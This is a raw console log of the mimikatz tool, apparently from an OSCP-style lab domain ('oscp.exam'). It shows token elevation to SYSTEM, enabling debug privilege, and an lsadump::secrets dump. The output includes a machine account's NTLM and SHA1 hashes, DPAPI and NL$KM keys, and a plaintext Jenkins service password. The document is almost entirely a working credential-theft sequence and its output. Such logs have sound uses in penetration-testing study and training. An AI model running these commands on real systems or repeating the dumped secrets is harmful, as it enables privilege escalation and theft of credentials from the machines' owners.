
  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

1176	{0;000003e7} 0 D 76192     	NT AUTHORITY\SYSTEM	S-1-5-18	(15g,28p)	Impersonation (Impersonation)
 -> Impersonated !
 * Process Token : {0;00377ba7} 2 F 4275322   	oscp\nate	S-1-5-21-395943061-4281203283-1985023469-1106	(14g,24p)	Primary
 * Thread Token  : {0;000003e7} 0 D 4315567   	NT AUTHORITY\SYSTEM	S-1-5-18	(15g,28p)	Impersonation (Impersonation)

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::secrets
Domain : MS01
SysKey : c83bd962b8f96d524b9304832b250599

Local name : MS01 ( S-1-5-21-4092024685-235929341-2660346364 )
Domain name : oscp ( S-1-5-21-395943061-4281203283-1985023469 )
Domain FQDN : oscp.exam

Policy subsystem is : 1.18
LSA Key(s) : 1, default {106c48a9-9d90-4d6f-23e9-5d876674fc3d}
  [00] {106c48a9-9d90-4d6f-23e9-5d876674fc3d} 598ade1f785d522048bc3fd6ccf6f985ad3f2cc75240463aded7d10724a586d4

Secret  : $MACHINE.ACC
cur/hex : ab 34 93 56 e6 e2 ef eb 44 45 90 38 47 a4 7b af 56 3f 57 7b 65 18 93 cd 78 f9 e1 ea 53 a8 04 cb 89 57 8c 60 46 ff 10 2f 12 53 a0 6d f2 23 35 6b 5c 5a a8 34 3a 1e 98 dc 32 42 e9 5e f6 5b 8c 56 6f 3b a2 5f db 93 ec f2 40 36 97 41 78 9a b5 75 d3 41 55 41 04 ca 3a 7b a4 58 6c 82 06 47 f2 ff ad 97 30 79 52 ac 8d b6 29 3c 65 eb 48 03 c3 49 c4 35 80 34 38 ba 9e d4 97 c9 1e 3a 0a 97 94 53 31 ec 8d a9 21 49 dc 73 61 0a ea e7 da 75 69 0d 99 ad ae 30 c1 f1 d1 f8 0c d2 a0 55 e1 59 b8 e8 48 94 1f d9 16 bf c9 e2 2a e3 d7 4c 1c 08 b6 d1 d5 76 87 22 4b 87 7c ad 2d 7d 81 5f f8 5e e9 30 1e e7 20 c7 be fa c2 70 5f 16 00 2c e4 a1 f6 a2 f0 b6 0a 78 ad 80 a3 cb c0 2a b3 fe ea a4 b5 7a e3 ca d8 d8 4a 0a 38 c7 a6 4a b7 8c 37 b1 90 57 
    NTLM:fd37ffbe5f92c571a28c328c0f84987a
    SHA1:6a48873fdcfb585f934b71513a09be176cb8c1b3
old/hex : 4f 79 10 c7 de 06 51 98 89 14 e3 91 f0 c3 f8 2d a4 7e 73 f9 70 56 3a e5 be 07 de f9 8b 4f 24 ff d7 78 26 b2 ed c6 27 2a 6a 18 e7 fd e0 4d dc 77 16 50 1f 77 da 95 0e ba 12 ab 74 62 d5 06 58 a1 d3 78 c6 de 69 ce eb 2a c7 b3 d4 0c eb 23 ea d1 5d 3f 83 7a e8 71 99 65 e6 b8 2b 90 6b 06 85 e0 9a 0e 80 32 99 5e 0e 8c 13 86 08 a4 b3 31 d8 92 6a be 47 2a a1 38 52 a3 79 75 23 5e a3 2e ec bf cd 50 66 f5 8a 50 e1 10 40 81 90 78 1b 0a 2d 42 db 2b 23 46 92 13 79 9b 9e fd 27 ec 1c b7 eb b2 d1 57 70 b1 ff 87 3b ff 18 05 25 fe 6f 0d 8e b6 e1 79 e3 c2 48 8e 28 ee 40 03 32 4f c1 e3 1a cc 11 55 9c 36 96 88 8d d0 ba 1f d0 9f 48 b8 6c 32 6f de 0d c7 7b 0b fe 92 8b c9 85 00 fb 56 ab aa 3a c5 75 49 8d d5 17 ff c2 c4 21 b2 99 3c 59 4b 
    NTLM:e91b56fb26b2d20a0bb6471d4fb9433d
    SHA1:d1d355b5f0cb4f8e1e430c072c21ec51029fd573

Secret  : DefaultPassword

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 92 7e 84 53 b7 11 45 b6 68 f4 65 7f 0a 42 af a4 35 df a8 80 38 31 e8 89 4d 1a a5 41 89 7e a7 30 fd 76 03 51 23 7c 8e 3c 
    full: 927e8453b71145b668f4657f0a42afa435dfa8803831e8894d1aa541897ea730fd760351237c8e3c
    m/u : 927e8453b71145b668f4657f0a42afa435dfa880 / 3831e8894d1aa541897ea730fd760351237c8e3c
old/hex : 01 00 00 00 c2 a3 bc 2b 17 f5 bb 8b cb 5f b3 48 d1 4d 77 50 2c 91 79 8c 3d 76 08 2c fb 4d 34 9c c3 0a be c0 33 55 54 73 33 16 5c b3 
    full: c2a3bc2b17f5bb8bcb5fb348d14d77502c91798c3d76082cfb4d349cc30abec03355547333165cb3
    m/u : c2a3bc2b17f5bb8bcb5fb348d14d77502c91798c / 3d76082cfb4d349cc30abec03355547333165cb3

Secret  : NL$KM
cur/hex : 6c e5 b1 ef 67 e6 51 31 b8 cc 72 1c 16 4f ab c0 ae 67 91 47 ce 60 e1 75 39 c3 29 d2 70 e2 c1 dc 44 c2 82 18 41 1d 17 2f 23 1e 2f ed 4c fe bf f4 5f d7 6c dc 61 fb 3d 02 20 6c 3f 4e 8b 7e d1 58 
old/hex : 6c e5 b1 ef 67 e6 51 31 b8 cc 72 1c 16 4f ab c0 ae 67 91 47 ce 60 e1 75 39 c3 29 d2 70 e2 c1 dc 44 c2 82 18 41 1d 17 2f 23 1e 2f ed 4c fe bf f4 5f d7 6c dc 61 fb 3d 02 20 6c 3f 4e 8b 7e d1 58 

Secret  : _SC_Jenkins / service 'Jenkins' with username : oscp\nate
cur/text: mariposa
old/text: peanut

mimikatz(commandline) # exit
Bye!
